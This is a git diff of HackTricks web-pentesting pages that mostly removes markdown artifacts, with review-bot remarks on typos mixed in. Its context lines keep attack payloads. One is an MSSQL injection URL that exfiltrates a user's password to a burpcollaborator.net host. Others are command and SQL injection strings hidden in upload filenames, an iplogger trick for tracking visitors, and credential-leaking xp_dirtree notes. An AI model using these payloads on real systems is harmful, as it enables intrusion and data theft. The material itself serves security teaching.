diff --git a/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md b/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md index ed83d70c..fe79ee4e 100644 --- a/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md +++ b/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md @@ -4,7 +4,7 @@ In this POST it's going to be explained an example using java.io.Serializable. ## Serializable -The Java `Serializable` interface (`java.io.Serializable` is a marker interface your classes must implement if they are to be **serialized** and **deserialized**. Java object serialization (writing) is done with the [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html) and deserialization (reading) is done with the [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html). +The Java `Serializable` interface (`java.io.Serializable` is a marker interface your classes must implement if they are to be **serialized** and **deserialized**. Java object serialization (writing) is done with the [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html) and deserialization (reading) is done with the [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html). Lets see an example with a **class Person** which is **serializable**. This class **overwrites the readObject** function, so when **any object** of this **class** is **deserialized** this **function** is going to b **executed**.\ In the example, the **readObject function** of the class Person calls the function `eat()` of his pet and the function `eat()` of a Dog (for some reason) calls a **calc.exe**. **We are going to see how to serialize and deserialize a Person object to execute this calculator:** 
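Review bot: the rewritten line `+The Java \`Serializable\` interface (\`java.io.Serializable\` is a marker interface…` is missing the closing parenthesis; it should read `(\`java.io.Serializable\`)`. The context line `this **function** is going to b **executed**` also needs `be`.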
diff --git a/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md b/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md index e0be26ed..a6923068 100644 --- a/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md +++ b/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md @@ -1,6 +1,6 @@ # Exploiting \_\_VIEWSTATE knowing the secrets -**The content of this post was extracted from** [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)**** +**The content of this post was extracted from** [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) ## Introduction @@ -116,7 +116,7 @@ _It uses the ActivitySurrogateSelector gadget by default that requires compiling #### Application path - it is important to find the root of the application path in order to create a valid ViewState unless: +it is important to find the root of the application path in order to create a valid ViewState unless: * The application uses .NET Framework version 4.0 or below; and * The `__VIEWSTATEGENERATOR` parameter is known. diff --git a/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/pentesting-web/deserialization/exploiting-__viewstate-parameter.md index 9f13b677..03ad11cd 100644 --- a/pentesting-web/deserialization/exploiting-__viewstate-parameter.md +++ b/pentesting-web/deserialization/exploiting-__viewstate-parameter.md 
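Review bot: removing the leading space in the `@@ -116,7` hunk leaves the sentence starting in lower case, `+it is important to find the root of the application path…`; capitalise it to `It is important`.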
@@ -173,7 +173,7 @@ out of band request with the current username ## References -* [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)**** -* ****[**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)****\ - **** -* ****[**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)**** +* [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/) +* [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)\ + +* [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) diff --git a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md index c53b16f4..bad6ee00 100644 --- a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md +++ b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md 
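Review bot: the rewritten medium.com reference still ends with `\` (a hard line break) and is followed by a `+` line containing only whitespace, so the rendered list gets a dangling break and a blank line between the second and third items. Drop the trailing backslash and the whitespace-only line so the three references form one list.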
@@ -117,7 +117,7 @@ Therefore, the only thing needed to get RCE a **vulnerable version of Log4j proc * [**CVE-2021-4104**](https://nvd.nist.gov/vuln/detail/CVE-2021-4104) **\[High]**: Did we say Log4j 2.x versions were vulnerable? What about **Log4j 1.x**?\ \ - While previously thought to be safe, Log4Shell found a way to lurk in the older Log4j too. Essentially, **non-default configuration of Log4j 1.x instances using the \_JMSAppender**\_\*\* class also become susceptible to the untrusted deserialization flaw\*\*.\ + While previously thought to be safe, Log4Shell found a way to lurk in the older Log4j too. Essentially, **non-default configuration of Log4j 1.x instances using the \_JMSAppender**\_** class also become susceptible to the untrusted deserialization flaw**.\ \ Although a less severe variant of CVE-2021-44228, nonetheless, this CVE impacts all versions of the [log4j:log4j](https://search.maven.org/artifact/log4j/log4j) and [org.apache.log4j:log4j](https://mvnrepository.com/artifact/org.apache.log4j/log4j) components for which only 1.x releases exist. Because these are [end-of-life](https://logging.apache.org/log4j/1.2/) versions, **a fix for 1.x branch does not exist anywhere**, and one should upgrade to _log4j-core_ 2.17.0. (Apparently 1.0 isn't vulnerable).\ 
@@ -231,7 +231,7 @@ For **more information** (_like limitations on RMI and CORBA vectors_) **check t ### RCE - Marshalsec with custom payload -_This trick is entirely taken from the **THM box:**_ [_**https://tryhackme.com/room/solar**_](https://tryhackme.com/room/solar)_\*\*\*\*_ +_This trick is entirely taken from the **THM box:**_ [_**https://tryhackme.com/room/solar**_](https://tryhackme.com/room/solar)__ For this exploit the tool [**marshalsec**](https://github.com/mbechler/marshalsec) (download a [**jar version from here**](https://github.com/RandomRobbieBF/marshalsec-jar)) will be used to create a LDAP referral server to direct connections to our secondary HTTP server were the exploit will be served: diff --git a/pentesting-web/deserialization/python-yaml-deserialization.md b/pentesting-web/deserialization/python-yaml-deserialization.md index 9c70c6ff..6151d11d 100644 --- a/pentesting-web/deserialization/python-yaml-deserialization.md +++ b/pentesting-web/deserialization/python-yaml-deserialization.md @@ -72,7 +72,7 @@ print(yaml.unsafe_load_all(data)) **Old versions** of pyyaml were vulnerable to deserialisations attacks if you **didn't specify the Loader** when loading something: `yaml.load(data)` -You can find the **** [**description of the vulnerability here**](https://hackmd.io/@defund/HJZajCVlP)**.** The proposed **exploit** in that page is: +You can find the [**description of the vulnerability here**](https://hackmd.io/@defund/HJZajCVlP)**.** The proposed **exploit** in that page is: ```yaml !!python/object/new:str diff --git a/pentesting-web/domain-subdomain-takeover.md b/pentesting-web/domain-subdomain-takeover.md index aa06a8e3..d4bfd236 100644 --- a/pentesting-web/domain-subdomain-takeover.md +++ b/pentesting-web/domain-subdomain-takeover.md 
@@ -21,7 +21,7 @@ There are several tools with dictionaries to check for possible takeovers: ## Exploiting a Subdomain takeover -**This information was copied from** [**https://0xpatrik.com/subdomain-takeover/**](https://0xpatrik.com/subdomain-takeover/)\*\*\*\* +**This information was copied from** [**https://0xpatrik.com/subdomain-takeover/**](https://0xpatrik.com/subdomain-takeover/) Recently, I [wrote](https://0xpatrik.com/subdomain-takeover-basics/) about subdomain takeover basics. Although the concept is now generally well-understood, I noticed that people usually struggle to grasp the risks that subdomain takeover brings to the table. In this post, I go in-depth and cover the most notable risks of _subdomain takeover_ from my perspective. diff --git a/pentesting-web/email-header-injection.md b/pentesting-web/email-header-injection.md index ccb00280..5358009b 100644 --- a/pentesting-web/email-header-injection.md +++ b/pentesting-web/email-header-injection.md 
@@ -70,9 +70,9 @@ Here are a few examples of different man pages of sendmail command/interface: * Postfix MTA: http://www.postfix.org/mailq.1.html * Exim MTA: https://linux.die.net/man/8/eximReferences -Depending on the **origin of the sendmail** binary different options have been discovered to abuse them and l**eak files or even execute arbitrary commands**. Check how in [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)**** +Depending on the **origin of the sendmail** binary different options have been discovered to abuse them and l**eak files or even execute arbitrary commands**. Check how in [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html) ## References -* [**https://resources.infosecinstitute.com/email-injection/**](https://resources.infosecinstitute.com/email-injection/)**** -* [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)**** +* [**https://resources.infosecinstitute.com/email-injection/**](https://resources.infosecinstitute.com/email-injection/) +* [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html) diff --git a/pentesting-web/file-inclusion/README.md b/pentesting-web/file-inclusion/README.md index 6867c9f0..c8e3bdd0 100644 --- a/pentesting-web/file-inclusion/README.md +++ b/pentesting-web/file-inclusion/README.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} diff --git a/pentesting-web/file-upload.md b/pentesting-web/file-upload.md index cbd6e83b..1216560c 100644 --- a/pentesting-web/file-upload.md +++ b/pentesting-web/file-upload.md 
@@ -45,7 +45,7 @@ The `.phar` files are like the `.jar` for java, but for php, and can be **used l The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**. -**Check a lot of possible file upload vulnerabilities with BurpSuit plugin** [**https://github.com/modzero/mod0BurpUploadScanner**](https://github.com/modzero/mod0BurpUploadScanner) **or use a console application that finds which files can be uploaded and try different tricks to execute code:** [**https://github.com/almandin/fuxploider**](https://github.com/almandin/fuxploider)\*\*\*\* +**Check a lot of possible file upload vulnerabilities with BurpSuit plugin** [**https://github.com/modzero/mod0BurpUploadScanner**](https://github.com/modzero/mod0BurpUploadScanner) **or use a console application that finds which files can be uploaded and try different tricks to execute code:** [**https://github.com/almandin/fuxploider**](https://github.com/almandin/fuxploider) ### **wget File Upload/SSRF Trick** 
@@ -83,10 +83,10 @@ Note that **another option** you may be thinking of to bypass this check is to m * Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection** * Set **filename** to `` to achieve a XSS * Set **filename** to `; sleep 10;` to test some command injection \(more [command injections tricks here](command-injection.md)\) -* \*\*\*\*[**XSS** in image \(svg\) file upload](xss-cross-site-scripting/#xss-uploading-files-svg) +* [**XSS** in image \(svg\) file upload](xss-cross-site-scripting/#xss-uploading-files-svg) * **JS** file **upload** + **XSS** = [**Service Workers** exploitation](xss-cross-site-scripting/#xss-abusing-service-workers) -* \*\*\*\*[**XXE in svg upload**](xxe-xee-xml-external-entity.md#svg-file-upload)\*\*\*\* -* \*\*\*\*[**Open Redirect** via uploading svg file](open-redirect.md#open-redirect-uploading-svg-files) +* [**XXE in svg upload**](xxe-xee-xml-external-entity.md#svg-file-upload) +* [**Open Redirect** via uploading svg file](open-redirect.md#open-redirect-uploading-svg-files) * [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/) * If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](ssrf-server-side-request-forgery.md). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**. diff --git a/pentesting-web/file-upload/README.md b/pentesting-web/file-upload/README.md index f339e7aa..9a55efb6 100644 --- a/pentesting-web/file-upload/README.md +++ b/pentesting-web/file-upload/README.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} 
@@ -53,7 +53,7 @@ Other useful extensions: 5. Add **another layer of extensions** to the previous check: * _file.png.jpg.php_ * _file.php%00.png%00.jpg_ -6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. **\*\*(useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php\*\* will execute code): +6. Try to put the **exec extension before the valid extension** and pray so the server is misconfigured. (useful to exploit Apache misconfigurations where anything with extension** _**.php**_**, but** not necessarily ending in .php** will execute code): * _ex: file.php.png_ 7. Using **NTFS alternate data stream (ADS)** in **Windows**. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server (e.g. “file.asax:.jpg”). This file might be edited later using other techniques such as using its short filename. The “**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. “file.asp::$data.”) 8. Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php 
@@ -148,7 +148,7 @@ Note that **another option** you may be thinking of to bypass this check is to m * If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**. * [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md) * Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications. -* Upload the **\*\*\[eicar]\(**[https://secure.eicar.org/eicar.com.txt](https://secure.eicar.org/eicar.com.txt)**) content to check if the server has any** antivirus\*\* +* Upload the \[eicar]\(**[https://secure.eicar.org/eicar.com.txt](https://secure.eicar.org/eicar.com.txt)**) content to check if the server has any** antivirus** * Check if there is any **size limit** uploading files Here’s a top 10 list of things that you can achieve by uploading (from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)): 
@@ -195,7 +195,7 @@ The decompressed files will be created in unexpected folders. One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application. -An automated exploit to create this kind of files can be found here: [**https://github.com/ptoomey3/evilarc**](https://github.com/ptoomey3/evilarc)\*\*\*\* +An automated exploit to create this kind of files can be found here: [**https://github.com/ptoomey3/evilarc**](https://github.com/ptoomey3/evilarc) ```python python2 evilarc.py -h diff --git a/pentesting-web/formula-injection.md b/pentesting-web/formula-injection.md index 0a103d4e..f16e0d1c 100644 --- a/pentesting-web/formula-injection.md +++ b/pentesting-web/formula-injection.md @@ -5,7 +5,7 @@ If your **input** is being **reflected** inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet. {% hint style="danger" %} -Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload. +Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload. {% endhint %} ## Hyperlink diff --git a/pentesting-web/hacking-jwt-json-web-tokens.md b/pentesting-web/hacking-jwt-json-web-tokens.md index 43373173..24bd9e38 100644 
--- a/pentesting-web/hacking-jwt-json-web-tokens.md +++ b/pentesting-web/hacking-jwt-json-web-tokens.md @@ -44,7 +44,7 @@ Check if the token lasts more than 24h... maybe it never expires. If there is a ## Brute-force HMAC secret -****[**See this page.**](../brute-force.md#jwt)**** +[**See this page.**](../brute-force.md#jwt) ## Modify the algorithm to None (CVE-2015-9235) diff --git a/pentesting-web/hacking-with-cookies/cookie-tossing.md b/pentesting-web/hacking-with-cookies/cookie-tossing.md index 4ef713f9..f9565f3e 100644 --- a/pentesting-web/hacking-with-cookies/cookie-tossing.md +++ b/pentesting-web/hacking-with-cookies/cookie-tossing.md @@ -57,6 +57,6 @@ A Cookie Tossin attack may be used also to perform **Cookie Bomb** attack: ### References -* ****[**@blueminimal**](https://twitter.com/blueminimal)**** -* ****[**https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers**](https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers)**** -* ****[**https://github.blog/2013-04-09-yummy-cookies-across-domains/**](https://github.blog/2013-04-09-yummy-cookies-across-domains/)**** +* [**@blueminimal**](https://twitter.com/blueminimal) +* [**https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers**](https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers) +* [**https://github.blog/2013-04-09-yummy-cookies-across-domains/**](https://github.blog/2013-04-09-yummy-cookies-across-domains/) diff --git a/pentesting-web/http-response-smuggling-desync.md b/pentesting-web/http-response-smuggling-desync.md index 7e61800b..8a039d86 100644 --- a/pentesting-web/http-response-smuggling-desync.md +++ b/pentesting-web/http-response-smuggling-desync.md 
@@ -34,7 +34,7 @@ Apart from being able to **distribute more easily tens of exploits** across legi ### Exploit Organisation -As explained previously, in order to abuse this technique, it's needed that the **first smuggled message** into the server **requires a lot of time to be processed**. +As explained previously, in order to abuse this technique, it's needed that the **first smuggled message** into the server **requires a lot of time to be processed**. This **time consuming request is enough** if we just want to **try to steal the victims response.** But if you want to perform a more complex exploit this will be a common structure for the exploit. diff --git a/pentesting-web/idor.md b/pentesting-web/idor.md index ae4a3b01..33b175b8 100644 --- a/pentesting-web/idor.md +++ b/pentesting-web/idor.md @@ -1,6 +1,6 @@ # IDOR -**Post taken from** [**https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489**](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)**** +**Post taken from** [**https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489**](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489) ## Unsuspected places to look for IDORs diff --git a/pentesting-web/oauth-to-account-takeover.md b/pentesting-web/oauth-to-account-takeover.md index 18f446df..844dc9e5 100644 --- a/pentesting-web/oauth-to-account-takeover.md +++ b/pentesting-web/oauth-to-account-takeover.md 
@@ -2,11 +2,11 @@ ## Basic Information -There are a couple different versions of OAuth, you can read [https://oauth.net/2/](https://oauth.net/2/) to get a baseline understanding. +There are a couple different versions of OAuth, you can read [https://oauth.net/2/](https://oauth.net/2/) to get a baseline understanding. In this article, we will be focusing on the most common flow that you will come across today, which is the [OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/). In essence, OAuth provides developers an **authorization mechanism to allow an application to access data or perform certain actions against your account, from another application** (the authorization server). -For example, let’s say website _**https://yourtweetreader.com**_ has functionality to **display all tweets you’ve ever sent**, including private tweets. In order to do this, OAuth 2.0 is introduced. _https://yourtweetreader.com_ will ask you to **authorize their Twitter application to access all your Tweets**. A consent page will pop up on _https://twitter.com_ displaying what **permissions are being requested**, and who the developer requesting it is. Once you authorize the request, _https://yourtweetreader.com_ will be **able to access to your Tweets on behalf of you**. +For example, let’s say website _**https://yourtweetreader.com**_ has functionality to **display all tweets you’ve ever sent**, including private tweets. In order to do this, OAuth 2.0 is introduced. _https://yourtweetreader.com_ will ask you to **authorize their Twitter application to access all your Tweets**. A consent page will pop up on _https://twitter.com_ displaying what **permissions are being requested**, and who the developer requesting it is. Once you authorize the request, _https://yourtweetreader.com_ will be **able to access to your Tweets on behalf of you**. Elements which are important to understand in an OAuth 2.0 context: 
@@ -243,5 +243,5 @@ If the platform you are testing is an OAuth provider [**read this to test for po ## References -* [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1)**** -* [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)**** +* [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1) +* [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors) diff --git a/pentesting-web/parameter-pollution.md b/pentesting-web/parameter-pollution.md index 3b0a386d..fe5475ec 100644 --- a/pentesting-web/parameter-pollution.md +++ b/pentesting-web/parameter-pollution.md @@ -1,6 +1,6 @@ # Parameter Pollution -**Copied from** [**https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654**](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)**** +**Copied from** [**https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654**](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654) **Summary :** diff --git a/pentesting-web/race-condition.md b/pentesting-web/race-condition.md index b4943118..feb485e8 100644 --- a/pentesting-web/race-condition.md +++ b/pentesting-web/race-condition.md 
@@ -74,7 +74,7 @@ The **problem** appears when you **accept it** and automatically sends a **`aut #### Race Condition in `Refresh Token` -Once you have **obtained a valid RT** you could try to **abuse it to generate several AT/RT** and **even if the user cancels the permissions** for the malicious application to access his data, **several RTs will still be valid.** +Once you have **obtained a valid RT** you could try to **abuse it to generate several AT/RT** and **even if the user cancels the permissions** for the malicious application to access his data, **several RTs will still be valid.** ## References diff --git a/pentesting-web/registration-vulnerabilities.md b/pentesting-web/registration-vulnerabilities.md index 05498abc..6a8f84a7 100644 --- a/pentesting-web/registration-vulnerabilities.md +++ b/pentesting-web/registration-vulnerabilities.md @@ -25,7 +25,7 @@ In that case you may try to bruteforce credentials. ### SQL Injection -****[**Check this page** ](sql-injection/#insert-statement)to learn how to attempt account takeovers or extract information via **SQL Injections** in registry forms. +[**Check this page** ](sql-injection/#insert-statement)to learn how to attempt account takeovers or extract information via **SQL Injections** in registry forms. ### Oauth Takeovers diff --git a/pentesting-web/regular-expression-denial-of-service-redos.md b/pentesting-web/regular-expression-denial-of-service-redos.md index a6ff47e3..8acd98c6 100644 --- a/pentesting-web/regular-expression-denial-of-service-redos.md +++ b/pentesting-web/regular-expression-denial-of-service-redos.md 
@@ -2,7 +2,7 @@ ## Introduction -**Copied from** [**https://owasp.org/www-community/attacks/Regular\_expression\_Denial\_of\_Service\_-\_ReDoS**](https://owasp.org/www-community/attacks/Regular\_expression\_Denial\_of\_Service\_-\_ReDoS)**** +**Copied from** [**https://owasp.org/www-community/attacks/Regular\_expression\_Denial\_of\_Service\_-\_ReDoS**](https://owasp.org/www-community/attacks/Regular\_expression\_Denial\_of\_Service\_-\_ReDoS) The **Regular expression Denial of Service (ReDoS)** is a [Denial of Service](https://owasp.org/www-community/attacks/Denial\_of\_Service) attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time. diff --git a/pentesting-web/reverse-tab-nabbing.md b/pentesting-web/reverse-tab-nabbing.md index b587feb2..7b64f3d6 100644 --- a/pentesting-web/reverse-tab-nabbing.md +++ b/pentesting-web/reverse-tab-nabbing.md @@ -86,4 +86,4 @@ Prevention information are documented into the [HTML5 Cheat Sheet](https://cheat {% embed url="https://owasp.org/www-community/attacks/Reverse_Tabnabbing" %} -**** + diff --git a/pentesting-web/sql-injection/README.md b/pentesting-web/sql-injection/README.md index ef085c3c..3e008b9d 100644 --- a/pentesting-web/sql-injection/README.md +++ b/pentesting-web/sql-injection/README.md 
@@ -246,7 +246,7 @@ In this case there **isn't** any way to **distinguish** the **response** of the You can use stacked queries to **execute multiple queries in succession**. Note that while the subsequent queries are executed, the **results** are **not returned to the application**. Hence this technique is primarily of use in relation to **blind vulnerabilities** where you can use a second query to trigger a DNS lookup, conditional error, or time delay. -**Oracle** doesn't support **stacked queries.** MySQL\*\*,\*\* Microsoft **and** PostgreSQL support\*\* them: `QUERY-1-HERE; QUERY-2-HERE` +**Oracle** doesn't support **stacked queries.** MySQL**,** Microsoft **and** PostgreSQL support** them: `QUERY-1-HERE; QUERY-2-HERE` ## Out of band Exploitation diff --git a/pentesting-web/sql-injection/mssql-injection.md b/pentesting-web/sql-injection/mssql-injection.md index 5de2f822..f619746d 100644 --- a/pentesting-web/sql-injection/mssql-injection.md +++ b/pentesting-web/sql-injection/mssql-injection.md @@ -42,7 +42,7 @@ https://vuln.app/getItem?id=1'%2buser_name(@@version)-- #### fn\_trace\_gettabe, fn\_xe\_file\_target\_read\_file, fn\_get\_audit\_file (from [here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)) - `fn_xe_file_target_read_file()` example: +`fn_xe_file_target_read_file()` example: ``` https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null)) 
@@ -74,9 +74,9 @@ https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2 -**Information taken from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL)**** +**Information taken from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL) -****[Microsoft SQL Server provides multiple extended stored procedures that allow you to interact with not only the network but also the file system and even the ](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[Windows Registry](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/). +[Microsoft SQL Server provides multiple extended stored procedures that allow you to interact with not only the network but also the file system and even the ](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[Windows Registry](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/). One technique that keeps coming up is the usage of the undocumented stored procedure `xp_dirtree` that allows you to list the directories in a folder. This stored procedure supports UNC paths, which can be abused to leak Windows credentials over the network or extract data using DNS requests. diff --git 